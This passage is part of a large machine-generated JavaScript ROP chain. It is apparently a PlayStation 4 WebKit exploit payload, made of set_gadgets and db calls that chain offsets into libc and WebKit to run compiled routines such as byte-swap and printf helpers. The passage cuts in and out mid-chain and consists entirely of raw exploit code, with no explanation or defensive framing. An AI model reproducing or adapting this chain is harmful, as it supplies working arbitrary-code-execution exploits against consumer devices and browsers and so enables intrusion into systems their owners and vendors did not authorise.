libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+573944, //L12748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+573960, //L12749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+573928, //L12747 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12747: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12748: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12749: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+574040, //L12750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+574056, //L12751 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12750: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12751: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+574216, //L12755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+574184, //L12753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+574200, //L12754 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12752: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L12753: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12754: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12755: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+574272, //L12757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L12757: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+574400, //L12759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+574416, //L12760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+574384, //L12758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12758: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12759: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12760: db([0, 0]); 
// 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+574512, //L12762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+574496, //L12761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12761: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12762: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+574648, //L12765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+574616, //L12763 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12763: db([0, 0]); // 0x0 set_gadgets([ libc_base+144605, //pop rdi //L12764: ropchain+128, //_ps4_printf_buffer libc_base+759608 //pop rax ]); //L12765: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+574792, //L12768 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+574760, //L12766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+574776, //L12767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12766: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12767: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12768: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+574880, //L12770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L12769: db([1, 0]); // 0x1 
set_gadget(libc_base+759608,); //pop rax //L12770: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+574928, //L12771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12771: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L12772: ropchain+128, //_ps4_printf_buffer webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+575000, //L12774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12774: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+575080, //L12776 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12776: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+575136, //L12777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12777: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+575264, //L12780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+575248, //L12779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12779: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12780: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+764760, //pop rsi ropchain+575368, //L12781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+575384, //L12782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12781: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12782: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+575504, //L12783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+575488, //L12784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12784: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12783: db([0, 0]); // 0x0 //L12725: set_gadget(libc_base+764760,); //pop rsi db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+1438842, //pop rdx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+3236123, //pop r9 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+759608, //pop rax libc_base+756281, //xor rax, rax libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+782311, //pop rsp libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([208, 0]); // 0xd0 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967080, 4294967295]); // -0xd8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([200, 0]); // 0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967088, 4294967295]); // -0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([192, 0]); // 0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967096, 4294967295]); // -0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([184, 0]); // 0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967104, 4294967295]); // -0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([176, 0]); // 0xb0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967112, 4294967295]); // -0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([168, 0]); // 0xa8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ webkit_base+14664103, //and rax, rcx libc_base+763368, //pop rcx 
write_addr, webkit_base+20307877, //mov [rax], rcx libc_base+764760 //pop rsi ]); db([4294967192, 4294967295]); // -0x68 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([32, 0]); // 0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([128, 0]); // 0x80 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+576832, //L12785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+782311 //pop rsp ]); //L12785: db([0, 0]); // 0x0 //___bswap64_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+576904, //L12787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12787: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+577000, //L12788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+577032, //L12791 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L12788: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12790: db([16, 0]); // 0x10 
set_gadget(webkit_base+568675,); //pop r8 //L12791: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+577136, //L12794 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+577120, //L12792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12792: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12794: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+577248, //L12795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+577280, //L12797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+577264, //L12796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12795: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12796: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12797: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+577384, //L12798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+577400, //L12799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12798: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12799: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+577520, //L12800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+577504, //L12801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12801: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12800: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+577608, //L12803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+577592, //L12802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12802: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12803: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+577712, //L12804 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+577728, //L12805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12804: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12805: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+577848, //L12806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+577832, //L12807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12807: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12806: db([0, 0]); // 0x0 //___bswap32_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+577920, //L12809 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12809: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+578016, //L12810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+578048, //L12813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L12810: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12812: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L12813: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+578152, //L12816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+578136, //L12814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12814: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12816: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+578328, //L12819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+578344, //L12820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+578296, //L12817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+578312, //L12818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12817: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L12818: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12819: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12820: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi 
libc_base+764760, //pop rsi ropchain+578504, //L12824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+578472, //L12822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+578488, //L12823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12821: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L12822: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12823: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12824: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+578624, //L12825 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+578656, //L12827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+578640, //L12826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12825: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12826: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12827: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+578760, //L12828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+578776, //L12829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12828: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12829: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+578896, //L12830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+578880, //L12831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12831: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12830: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+578984, //L12833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+578968, //L12832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L12832: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12833: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+579088, //L12834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+579104, //L12835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L12834: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12835: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+579224, //L12836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+579208, //L12837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L12837: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L12836: db([0, 0]); // 0x0 //___bswap16_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+579296, //L12839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L12839: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+579392, //L12840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+579424, //L12843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L12840: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12842: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L12843: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+579528, //L12846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+579512, //L12844 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12844: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12846: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+579688, //L12850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+579656, //L12848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+579672, //L12849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12847: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L12848: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12849: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12850: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl 
